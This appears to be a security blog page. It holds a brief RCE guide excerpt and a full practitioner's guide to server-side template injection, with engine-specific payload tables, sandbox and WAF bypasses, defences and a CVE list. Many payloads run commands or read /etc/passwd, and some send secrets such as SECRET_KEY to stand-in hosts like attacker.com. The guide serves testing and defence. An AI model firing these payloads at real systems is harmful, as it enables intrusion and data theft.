Rce

Comprehensive RCE Guide

Comprehensive RCE Guide A practitioner’s reference for Remote Code Execution — vulnerability classes, exploitation primitives, language-specific chains, real-world CVEs, and detection/prevention. Compiled from 95 research sources. Table of Contents Fundamentals RCE Classes & Taxonomy OS Command Injection Code Injection & Expression Injection Server-Side Template Injection (SSTI) File Upload to RCE Insecure Deserialization SQL Injection to RCE SSRF & LFI Chains to RCE Memory Corruption Primer Kernel, Driver & Container Escape Supply Chain RCE AI / LLM Agent RCE Real-World Exploit Chains Tools & Automation Detection & Prevention Payload Quick Reference 1. Fundamentals Remote Code Execution is the ability to run attacker-chosen instructions on a remote system without physical or local shell access. It sits at the top of the impact pyramid — almost every bug class, if chained far enough, ends at RCE. ...

April 10, 2026 · 31 min · Carl Sampson

Comprehensive SSTI Guide

Comprehensive SSTI Guide A practitioner’s reference for Server-Side Template Injection — template engine vulnerabilities, exploitation techniques, payload development, framework-specific attacks, and defense strategies. Covers detection methodologies, engine-specific exploitation, and secure templating practices. Compiled from 40 research sources. Table of Contents Fundamentals Detection & Identification Template Engine Exploitation Framework-Specific Attacks Payload Development Advanced Exploitation Bypass Techniques Testing Methodology Secure Implementation Detection & Prevention CVE Reference 1. Fundamentals SSTI Attack Surface Template Context Risk Level Common Locations User Input Rendering Critical Email templates, reports, dynamic pages Configuration Files High Template-based configs, dynamic routing Error Messages Medium Custom error pages, debug output Log Messages Low Log formatting, audit trails Email Workflow Templates Critical Notification templates, marketing emails (Shopify Return Magic, Fides) Recipe/CMS Content Fields Critical User-editable content rendered by template engines (Tandoor Recipes, Alfresco) JMS/Message Headers High Apache Camel template override headers (CamelFreemarkerTemplate, CamelVelocityTemplate) Template Engine Landscape Engine Language Popularity Exploitation Difficulty Jinja2 Python Very High Medium Twig PHP High Medium FreeMarker Java High High Velocity Java Medium High Thymeleaf Java Medium Medium Smarty PHP Medium Low Mako Python Low Low Handlebars Node.js Very High Medium Pug (Jade) Node.js High Medium Go html/template Go Medium High (context-dependent) Go text/template Go Medium Medium Jelly Java Medium (ServiceNow) Medium MVEL Java Low Low Mustache Multi-language Medium High (logicless by design) Tornado Python Medium Medium 2. Detection & Identification Detection Methodology SSTI DETECTION FLOW: 1. Identify template injection points 2. Test mathematical expressions 3. Analyze error messages 4. Determine template engine 5. Craft engine-specific payloads 6. Test blind detection via time-based or OOB channels Basic Detection Payloads Test Case Payload Expected Result Mathematical ${7*7} 49 if vulnerable Mathematical {​{7*7}} 49 if vulnerable Mathematical <%=7*7%> 49 if vulnerable String Concatenation ${'a'+'b'} ab if vulnerable Function Call ${T(java.lang.System).getProperty('user.name')} Username if Spring EL Go Detection {​{ . }} Memory address of passed object if Go template Handlebars Detection {​{this}} [object Object] if Handlebars FreeMarker String ${"Hello " + "World"} Hello World if FreeMarker FreeMarker Array ${["one", "two", "three"][1]} two if FreeMarker FreeMarker Length ${"test"?length} 4 if FreeMarker FreeMarker Date ${.now?string("yyyy-MM-dd")} Current date if FreeMarker Jelly (ServiceNow) <g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate> 1337 in error message Thymeleaf Inline [[${7*7}]] 49 if Thymeleaf expression inlining Template Engine Fingerprinting IDENTIFICATION DECISION TREE: ├── {​{7*7}} = 49 │ ├── {​{this}} = [object Object] → Handlebars (Node.js) │ ├── Jinja2 (Python) │ ├── Twig (PHP) │ └── Nunjucks (Node.js) ├── ${7*7} = 49 │ ├── ${"test"?length} = 4 → FreeMarker (Java) │ ├── ${T(java.lang.Runtime)} works → Spring EL (Java) │ └── Velocity (Java) ├── <%=7*7%> = 49 │ ├── ERB (Ruby) │ └── ASP Classic ├── {7*7} = 49 │ └── Smarty (PHP) ├── {​{ . }} = memory address │ └── Go html/template or text/template ├── [[${7*7}]] = 49 │ └── Thymeleaf (Java) expression inlining └── <g:evaluate>...</g:evaluate> executes └── Jelly (ServiceNow) Blind SSTI Detection Method Payload Example Verification Time-based (Jinja2) {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('sleep 10').read()}} Response delay Time-based (FreeMarker) <#assign ex="freemarker.template.utility.Execute"?new()>${ex("sleep 10")} Response delay DNS Exfiltration {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup x.attacker.com').read()}} DNS logs HTTP Callback Jinja2 urllib.request.urlopen to attacker URL HTTP logs 3. Template Engine Exploitation Jinja2 (Python) Exploitation Attack Vector Payload Impact Basic RCE {​{config.__class__.__init__.__globals__['os'].popen('id').read()}} Command execution Subprocess {​{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['subprocess'].check_output('whoami',shell=True)}} Command execution File Read {​{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}} File access Config Access {​{config.SECRET_KEY}} Sensitive data exposure Lipsum Shorthand {​{lipsum.__globals__}} Bypass length limits Cycler RCE {​{cycler.__init__.__globals__.os.popen('id').read()}} Shorter RCE payload Hex-encoded attr() {​{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(418)('id',shell=True,stdout=-1)|attr('communicate')()|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}} Filter bypass RCE (CVE-2025-23211) Warning class import {​% for s in ().__class__.__base__.__subclasses__() %}{​% if "warning" in s.__name__ %}{​{s()._module.__builtins__['__import__']('os').popen("env").read()}}{​% endif %}{​% endfor %} RCE via warning subclass (Fides advisory) Twig (PHP) Exploitation TWIG ATTACK PATTERNS: ├── Filter Abuse │ ├── {​{_self.env.registerUndefinedFilterCallback("exec")}} │ ├── {​{_self.env.getFilter("id")}} │ └── {​{["id"]|filter("system")}} ├── Function Injection │ ├── {​{_self.env.registerUndefinedFunction("exec")}} │ └── {​{_self.env.getFunction("system")}} ├── Object Injection │ ├── {​{app.request.query.get('cmd')|passthru}} │ └── {​{dump(app)}} (information disclosure) └── Escape Handler Abuse (Grav CMS — GHSA-2m7x-c7px-hp58) ├── {​{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }} └── {​{ ['id'] | escape('system', 'system') }} (Redefine escape function via setEscaper to system(), bypasses sandbox when not enabled) FreeMarker (Java) Exploitation Technique Payload Description Object Creation <#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")} Command execution Static Method Call ${"freemarker.template.utility.ObjectConstructor"?new()("java.lang.ProcessBuilder","id").start()} Process creation File System Access <#assign fos=freemarker.template.utility.ObjectConstructor("java.io.FileOutputStream","/tmp/test")> File manipulation ?lower_abc Filter Bypass ${(6?lower_abc+18?lower_abc+...)?new()(9?lower_abc+4?lower_abc)} Reconstruct “freemarker.template.utility.Execute” char-by-char to bypass keyword blocklists CamelContext Sandbox Escape <#assign cr=camelContext.getClassResolver()><#assign i=camelContext.getInjector()><#assign se=i.newInstance(cr.resolveClass('javax.script.ScriptEngineManager'))>${se.getEngineByName("js").eval("...")} RCE even with ClassResolver sandbox enabled (Apache Camel) CamelContext Language $camelContext.resolveLanguage("groovy").createExpression(<PAYLOAD>).evaluate(exchange, Object.class) Groovy expression via Camel context Alfresco Sandbox Bypass Exploit exposed objects in FreeMarker templates to bypass restrictions (CVE-2023-49964, incomplete fix for CVE-2020-12873) RCE in Alfresco CMS Handlebars (Node.js) Exploitation Technique Payload Description Prototype Pollution + AST Injection Pollute Object.prototype.type = 'Program' and Object.prototype.body with crafted AST containing RCE in NumberLiteral value Bypass parser validation, inject code directly into compiler Constructor Chain `{​{#with “s” as string toString Override + bind() Override Object.prototype.toString via defineProperty, use bind() to create function returning attacker payload, then invoke via Function constructor Full RCE without scope-defined functions (Shopify Return Magic) pendingContent Detection Pollute Object.prototype.pendingContent with test string Detect Handlebars engine in black-box with prototype pollution Pug (Node.js) Exploitation Technique Payload Description AST Injection via block Pollute Object.prototype.block = {"type":"Text","val":"<script>alert(origin)</script>"} XSS/content injection via prototype pollution Code Injection via line Pollute Object.prototype.block.type = "Code" with body containing RCE payload Command execution via AST manipulation Thymeleaf (Java) Exploitation THYMELEAF ATTACK PATTERNS: ├── Expression Preprocessing Double-Eval │ ├── __${path}__ preprocesses user input, result evaluated as expression │ ├── URL path injection: http://target/(${T(java.lang.Runtime).getRuntime().exec('calc')}) │ └── Works on Jetty (allows {} in path), blocked on Tomcat (URL-encodes {}) ├── Spring Boot 3.3.4 Denylist Bypass (modzero research) │ ├── Thymeleaf blocks T() for static class access and org.springframework.util.ReflectionUtils │ ├── Bypass via org.apache.commons.lang3.reflect.MethodUtils (not on denylist) │ ├── "".class.forName("org.apache.commons.lang3.reflect.MethodUtils") │ │ .invokeMethod( │ │ "".class.forName("org.apache.commons.lang3.reflect.MethodUtils") │ │ .invokeStaticMethod("".class.forName("java.lang.Runtime"),"getRuntime"), │ │ "exec", "whoami") │ └── Full payload reads command output via IOUtils + file write for non-blind RCE ├── CVE-2023-38286 (Spring Boot Admin) │ ├── Bypass Thymeleaf blacklists via ReflectionUtils (older versions) │ ├── th:with chaining: findMethod → invokeMethod → exec │ └── Requires MailNotifier enabled + write access to env vars └── CVE-2022-46166 (Spring Boot Admin) └── RCE via variable coverage in notification templates Velocity (Java) Exploitation Technique Payload Description CamelContext RCE ${camelContext.class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("...")} RCE via JavaScript engine in Apache Camel Template Override Send CamelVelocityTemplate header to override default template Dynamic template injection via message headers Resource URI Override Send CamelVelocityResourceUri header pointing to file:///etc/passwd Arbitrary file disclosure MVEL (Java) Exploitation Technique Payload Description Direct RCE @{java.lang.Runtime.getRuntime().exec('id')} Direct runtime access ObjectFactory RCE @{com.sun.org.apache.xerces.internal.utils.ObjectFactory.newInstance("javax.script.ScriptEngineManager",null,false).getEngineByName('js').eval("...")} Via ScriptEngine Template Override Send CamelMvelTemplate header Apache Camel dynamic template Go Template Exploitation GO SSTI ATTACK PATTERNS: ├── Detection │ └── {​{ . }} — prints memory address/object dump of passed struct ├── Data Leakage │ ├── {​{ .Email }} / {​{ .Password }} — access struct fields │ └── Leaks any exported field on the passed object ├── Method Invocation │ ├── {​{ .MethodName "arg" }} — call exported methods on passed struct │ └── Methods must be exported (capitalized) to be callable ├── Gin Framework Gadgets │ └── {​{ .Writer.WriteString "<script>alert(1)</script>" }} — XSS via response writer ├── Echo Framework Gadgets │ ├── {​{ .File "/etc/passwd" }} — arbitrary file read │ ├── {​{ .Attachment "/etc/passwd" "passwd" }} — file read via attachment │ ├── {​{ .Inline "/etc/passwd" "passwd" }} — file read inline │ └── {​{ $x:=.Echo.Filesystem.Open "/etc/hostname" }} {​{ $x.Seek 1 0 }} {​{ .Stream 200 "text/plain" $x }} — file read with I/O control ├── Fiber Framework Gadgets │ ├── {​{ .App.Shutdown }} — denial of service │ └── {​{ .Response.SendFile "/etc/hostname" }} {​{ .Response.Body }} — file read via fasthttp.Response ├── Method Confusion (OnSecurity Research) │ ├── If passed object type matches a method's receiver, call with custom params │ ├── echo.Context.File("path") gadget for arbitrary file read │ └── Gadget hunting: search imported modules for exported methods with dangerous behavior └── text/template vs html/template ├── text/template allows direct "call" for public functions — higher risk └── html/template restricts call — requires gadget chains Jelly (ServiceNow) Exploitation Technique Payload Description Template Injection Probe <g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate> Confirm injection via math result (1337) in error message DB Credential Theft Inject <g:evaluate> to read glide.db.properties via SecurelyAccess + getBufferedReader() Extract database connection strings Chained Exploitation CVE-2024-4879 (title injection) + CVE-2024-5217 (mitigation bypass) + CVE-2024-5178 (file filter bypass) Full RCE chain on ServiceNow Style Tag Bypass Embed Jelly tags inside <style> element in jvar_page_title parameter Bypass basic input validation 4. Framework-Specific Attacks Spring Framework (Java) Context Payload Impact Spring EL ${T(java.lang.Runtime).getRuntime().exec('id')} RCE SpEL Injection #{T(java.lang.System).getProperty('user.name')} Information disclosure Request Context ${@requestMappingHandlerMapping.getApplicationContext().getEnvironment().getProperty('java.version')} Environment access Thymeleaf Double-Eval '+${7*7}+' in Referer header with __${Referer}__ preprocessing RCE via preprocessing (modzero) MethodUtils Bypass "".class.forName("org.apache.commons.lang3.reflect.MethodUtils").invokeStaticMethod(...) Bypass Thymeleaf denylist in Spring Boot 3.3.4+ WebAsyncManager Header Exfil Access #ctx.getVariable("...WebAsyncManager...") to read request headers and write response Non-blind RCE without outbound connections Django (Python) DJANGO TEMPLATE ATTACKS: ├── Debug Information │ ├── {​{settings.SECRET_KEY}} │ ├── {​{settings.DATABASES}} │ └── {​{settings.DEBUG}} ├── Object Traversal │ ├── {​{request.META}} │ ├── {​{request.user}} │ └── {​{request.session}} └── Filter Abuse ├── Custom filters with dangerous functions └── Template tag injection Laravel (PHP) Attack Type Payload Result Blade RCE @php(system('id')) @endphp Command execution Variable Access {​{$app->make('config')->get('database.default')}} Configuration disclosure Helper Function {​{app('Illuminate\Contracts\Console\Kernel')->call('route:list')}} Application introspection Apache Camel (Java) APACHE CAMEL SSTI (CVE-2020-11994): ├── Affected Components │ ├── camel-freemarker (CamelFreemarkerTemplate header) │ ├── camel-velocity (CamelVelocityTemplate header) │ ├── camel-mvel (CamelMvelTemplate header) │ └── camel-mustache (MustacheResourceUri header — file disclosure only) ├── Attack Pattern │ ├── Override default template via message header injection │ ├── Header source depends on consumer: JMS properties, HTTP headers, etc. │ └── ResourceUri headers enable arbitrary file disclosure (file:///etc/passwd) ├── Sandbox Bypass │ ├── camelContext object exposed in template context │ ├── getInjector() + getClassResolver() → instantiate arbitrary classes │ └── resolveLanguage("groovy") → evaluate arbitrary Groovy expressions └── Impact └── RCE + Arbitrary File Disclosure across all template components Grav CMS (PHP/Twig) Attack Type Payload Result setEscaper Abuse {​{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }} then {​{ ['id'] | escape('system', 'system') }} RCE by redefining escape filter to system() Root Cause Twig sandbox not enabled; unrestricted access to extension classes via template context Arbitrary callable registration 5. Payload Development Payload Construction Strategy PAYLOAD DEVELOPMENT PROCESS: ├── Environment Discovery │ ├── Available classes/modules │ ├── Security restrictions │ └── Execution context ├── Bypass Development │ ├── Filter evasion │ ├── Character restrictions │ └── Length limitations ├── Payload Optimization │ ├── Minimize detection │ ├── Maximize impact │ └── Ensure reliability └── Multi-Stage Delivery ├── Store payload in persistent objects (Jinja2 config object) ├── Retrieve and execute across separate requests └── Useful when injection point has size limits (email fields) Common Payload Patterns Goal Python/Jinja2 PHP/Twig Java/FreeMarker Node.js/Handlebars Go List Classes {​{''.__class__.__mro__[1].__subclasses__()}} {​{dump()}} <#list .data_model?keys as key>${key}</#list> {​{this}} {​{ . }} Execute Command {​{cycler.__init__.__globals__.os.popen('id').read()}} {​{_self.env.registerUndefinedFilterCallback("system")}} <#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")} Prototype pollution + AST injection N/A (gadget-dependent) Read File {​{get_flashed_messages.__globals__['current_app'].open_resource('../../../etc/passwd').read()}} {​{include('/etc/passwd')}} <#assign file=...ObjectConstructor("java.io.File","/etc/passwd")> N/A {​{ .File "/etc/passwd" }} (Echo) Size-Limited Payload Technique (Jinja2) MULTI-REQUEST PAYLOAD STAGING: 1. Store payload in config object via short injection: {​{config.update(a=request.args.get('a'))}} with URL parameter: ?a=<long RCE payload> 2. Verify storage: {​{config.a}} 3. Execute stored payload: {​{''.__class__.__mro__[1].__subclasses__()...__globals__['os'].popen(config.a).read()}} Use case: SSTI in email fields with RFC-imposed size limits 6. Advanced Exploitation Blind SSTI Exploitation Detection Method Payload Verification Time-based {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['time'].sleep(5)}} Response delay DNS Exfiltration {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup whoami.attacker.com').read()}} DNS logs HTTP Callback {​{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['urllib'].request.urlopen('http://attacker.com/'+config.SECRET_KEY)}} HTTP logs Sandbox Escape Techniques SANDBOX BYPASS METHODS: ├── Python/Jinja2 │ ├── __builtins__ access via globals │ ├── Class traversal to dangerous modules │ ├── Import statement reconstruction │ └── Warning subclass → __builtins__['__import__'] chain ├── Java/FreeMarker │ ├── ObjectConstructor for arbitrary class instantiation │ ├── Static method calls via ?new() │ ├── Reflection API abuse │ ├── CamelContext.getInjector() + getClassResolver() (Apache Camel) │ └── ScriptEngineManager for Groovy/JavaScript eval ├── Java/Thymeleaf │ ├── Expression preprocessing (__...__) double-evaluation │ ├── org.apache.commons.lang3.reflect.MethodUtils (bypass Spring Boot 3.3.4 denylist) │ ├── "".class.forName() to load arbitrary classes │ └── ReflectionUtils (older versions, now denylisted) ├── PHP/Twig │ ├── Filter/function registration │ ├── Object property access │ ├── Include/eval function calls │ └── setEscaper() to redefine escape function as system() (Grav CMS) └── Node.js/Handlebars ├── AST Injection via prototype pollution (bypass parser entirely) ├── Function constructor via this.constructor.constructor ├── Object.prototype.toString override + bind() for RCE └── Built-in helper abuse (with, blockHelperMissing) Prototype Pollution to SSTI (Node.js) PROTOTYPE POLLUTION → SSTI CHAIN: ├── Handlebars │ ├── Pollute Object.prototype.type = "Program" │ ├── Pollute Object.prototype.body with AST containing RCE in NumberLiteral.value │ ├── Template string bypasses parser (treated as pre-parsed AST) │ └── Compiler executes injected code directly ├── Pug │ ├── Pollute Object.prototype.block with {type:"Text", val:"<payload>"} │ ├── When ast.type is "While", walkAST follows ast.block (uses prototype) │ └── High reliability: any template referencing arguments triggers it └── Detection ├── Handlebars: Object.prototype.pendingContent = "<test>" → appears in output └── Pug: Object.prototype.block = {type:"Text", val:"<test>"} → appears in output 7. Bypass Techniques Filter Evasion Restriction Bypass Technique Example Keyword Blacklist String concatenation {​{'sy'+'stem'}} Character Filtering Unicode/Encoding {​{'\u0073\u0079\u0073\u0074\u0065\u006d'}} Length Limits Shortened payloads {​{lipsum.__globals__}} Quotes Blocked String methods {​{request.args.cmd|system}} Keyword Blacklist (FreeMarker) ?lower_abc encoding 6?lower_abc = “f”, reconstruct class names char-by-char Attribute Name Filtering Hex-encoded attr() |attr('\x5f\x5fclass\x5f\x5f') instead of .__class__ Size Limit Config object staging Store payload in config.a via one request, execute in another Thymeleaf Static Class Block commons-lang3 MethodUtils Use "".class.forName(...) to load non-denylisted reflection class ServiceNow Mitigation Style tag wrapper + Jelly xmlns Embed <g:evaluate> inside <style> tags WAF Bypass Strategies WAF EVASION TECHNIQUES: ├── Encoding Variations │ ├── URL encoding (%7B%7B) │ ├── Unicode encoding (\u007B\u007B) │ └── HTML entity encoding (&lbrace;&lbrace;) ├── Structure Manipulation │ ├── Whitespace insertion {​{ 7*7 }} │ ├── Comment insertion {# comment #} │ └── Nested expressions {​{7*{​{7}}}} ├── Payload Fragmentation │ ├── Multi-step injection │ ├── Context-dependent payloads │ └── Request splitting ├── FreeMarker-Specific │ ├── ?lower_abc / ?upper_abc character reconstruction │ ├── 1.1?c[1] to generate dot character │ └── Numeric built-in abuse to construct arbitrary strings └── Thymeleaf-Specific ├── Preprocessor double-evaluation via __${...}__ ├── @{} link expression parentheses to clear context └── Server-specific: Jetty allows {} in URL path, Tomcat blocks 8. Testing Methodology Manual Testing Workflow Phase Activities Tools/Techniques Discovery Input point identification Burp Suite, manual analysis Detection Template injection testing Mathematical expressions, error analysis Identification Template engine fingerprinting Specific syntax testing, decision tree Exploitation Payload development Engine documentation, trial and error Impact Assessment Privilege escalation, data access Full exploitation chains Blind Validation Time-based and OOB testing sleep commands, DNS/HTTP callbacks Automated Testing Tools SSTI TESTING ARSENAL: ├── Detection Tools │ ├── tplmap (comprehensive scanner — epinna) │ ├── SSTImap (exploitation framework — vladko312) │ ├── Burp extensions (various) │ └── Nuclei templates (e.g., CVE-2024-5217.yaml) ├── Payload Generators │ ├── PayloadsAllTheThings (payload collection) │ ├── SecLists (template payloads) │ └── Custom scripts ├── Framework-Specific │ ├── j2eeTester (Java templates) │ ├── TwigSecurityChecker (Twig) │ └── JinjaSecurityScanner (Jinja2) ├── Reconnaissance │ ├── Shodan/Censys/FOFA (identify exposed instances, e.g., ServiceNow) │ └── Nuclei for automated version/vulnerability probing └── CI/CD Integration ├── SAST rules: flag {​{{ in .hbs files (Handlebars triple braces) ├── Secrets scanners: detect credentials in templates └── Build guardrails: break on unsafe patterns 9. Secure Implementation Secure Template Design Principles Principle Implementation Security Benefit Input Validation Strict allowlist validation Prevents injection Context Isolation Separate template contexts Limits impact Minimal Privileges Restricted template capabilities Reduces attack surface Output Encoding Automatic encoding Prevents XSS Sandbox Enforcement Enable template engine sandbox mode Limits exploitation scope Least Privilege Containers Run containers as non-root Limits post-exploitation impact (CVE-2025-23211) Framework-Specific Security SECURE CONFIGURATION: ├── Jinja2/Django │ ├── autoescape=True (XSS prevention) │ ├── Restrict dangerous globals │ ├── Custom filter validation │ └── Use SandboxedEnvironment for user-controlled templates ├── Twig/Symfony │ ├── Strict mode enabled │ ├── Sandbox mode for user content (prevents setEscaper abuse) │ ├── Function/filter allowlisting │ └── Block access to internal extension objects ├── FreeMarker/Spring │ ├── Restricted method calls │ ├── Template loading restrictions │ ├── API access controls │ └── Use TemplateClassResolver.ALLOWS_NOTHING_RESOLVER ├── Thymeleaf/Spring Boot │ ├── Avoid expression preprocessing (__...__) with user input │ ├── Denylist covers java.*, javax.*, org.springframework.util.* │ ├── Audit third-party libs (commons-lang3 MethodUtils still exploitable) │ └── Prefer Tomcat over Jetty (Tomcat blocks {} in URL paths) ├── Handlebars/Node.js │ ├── Always use double braces {​{ }} (auto-escaping), never triple {​{{ }}} │ ├── Audit custom helpers — never use SafeString with user input │ ├── Protect against prototype pollution (freeze Object.prototype, use Maps) │ └── Keep dependencies updated (prototype pollution CVEs) ├── Go Templates │ ├── Prefer html/template over text/template (restricts "call") │ ├── Never pass entire framework context (gin.Context, echo.Context) to templates │ ├── Create minimal view structs with only needed fields │ └── Avoid exported methods with dangerous behavior on passed types ├── ServiceNow/Jelly │ ├── Apply vendor patches promptly (CVE-2024-4879 exploited in wild) │ ├── Sanitize jvar_page_title and similar parameters │ └── Monitor for Jelly tag injection patterns in logs └── General Practices ├── Pre-compile templates (never build from user strings) ├── Validate all inputs ├── Monitor template rendering └── Run applications as non-root in containers 10. Detection & Prevention Runtime Protection Control Implementation Effectiveness Input Sanitization Remove template syntax High (if comprehensive) Template Sandboxing Restricted execution environment Medium (bypass possible) Content Security Policy Restrict dynamic content Low (server-side attack) Web Application Firewall Pattern-based blocking Medium (bypass common) Prototype Pollution Prevention Object.freeze, Map usage, input validation High (prevents AST injection in Node.js) Monitoring & Detection DETECTION STRATEGIES: ├── Log Analysis │ ├── Template rendering errors │ ├── Unusual template patterns ({​{, ${, <#, <g:evaluate>) │ ├── Performance anomalies │ └── ServiceNow: monitor login.do for Jelly tag injection ├── Runtime Monitoring │ ├── Template execution time (detect sleep-based blind SSTI) │ ├── Memory consumption │ ├── System call monitoring (exec, popen, ProcessBuilder) │ └── DNS/HTTP outbound connections from template rendering ├── Security Scanning │ ├── Regular SAST scans (CodeQL, Semgrep) │ ├── DAST testing (tplmap, SSTImap, Nuclei) │ ├── Dependency vulnerability checks (prototype pollution in Node.js) │ └── Internet exposure scanning (Shodan, Censys, FOFA) └── Supply Chain ├── Monitor npm advisories for Handlebars, Pug, flat ├── Track Java dependency updates (FreeMarker, Thymeleaf, commons-lang3) └── Automated SCA in CI/CD pipelines Incident Response Phase Actions Considerations Detection Log analysis, alert investigation False positive filtering Containment Template access restriction Service availability Eradication Vulnerable template removal Code deployment Recovery Secure template implementation Testing requirements Lessons Learned Process improvement Training needs 11. CVE Reference CVE Product Engine CVSS Impact CVE-2024-4879 ServiceNow Jelly 9.3 Unauthenticated RCE via title injection CVE-2024-5217 ServiceNow Jelly 9.2 Template injection mitigation bypass CVE-2024-5178 ServiceNow Jelly 6.9 Filesystem filter bypass, sensitive file read CVE-2025-23211 Tandoor Recipes Jinja2 9.9 Authenticated SSTI to root RCE in Docker CVE-2023-38286 Spring Boot Admin Thymeleaf – RCE via Thymeleaf blacklist bypass CVE-2022-46166 Spring Boot Admin Thymeleaf – RCE via variable coverage in notifiers CVE-2023-49964 Alfresco FreeMarker – SSTI sandbox bypass (incomplete fix of CVE-2020-12873) CVE-2020-12873 Alfresco FreeMarker – Original SSTI via exposed FreeMarker objects CVE-2020-11994 Apache Camel FreeMarker/Velocity/MVEL/Mustache – RCE + file disclosure via template header override CVE-2024-29178 Apache StreamPark FreeMarker – FreeMarker SSTI to RCE CVE-2019-20920 Handlebars (npm) Handlebars – Prototype pollution leading to RCE GHSA-2m7x-c7px-hp58 Grav CMS Twig – RCE via setEscaper() without sandbox GHSA-c34r-238x-f7qx Fides Jinja2 – RCE via unsandboxed email template rendering Key Takeaways Input Validation: Never trust user input in template contexts Template Isolation: Separate user-controlled and system templates Minimal Privileges: Restrict template engine capabilities Regular Testing: Include SSTI in security testing processes Framework Updates: Keep template engines updated with security patches Sandbox Enforcement: Always enable sandbox mode when user content is rendered by template engines Prototype Pollution Awareness: In Node.js, prototype pollution can chain to full SSTI/RCE even in “logicless” engines like Handlebars Context Minimization: Pass only minimal data structures to templates — never entire framework contexts (Go, Spring) Container Hardening: Run applications as non-root to limit post-exploitation impact Supply Chain Monitoring: Track template engine dependency vulnerabilities in CI/CD This guide compiles practical SSTI knowledge from 40 research sources. Template injection vulnerabilities remain common due to the complexity of modern template engines and their powerful features. The attack surface extends beyond traditional web frameworks to message-driven architectures (Apache Camel), CMS platforms (Alfresco, Grav), enterprise IT management (ServiceNow), and Node.js prototype pollution chains. ...

April 10, 2026 · 16 min · Carl Sampson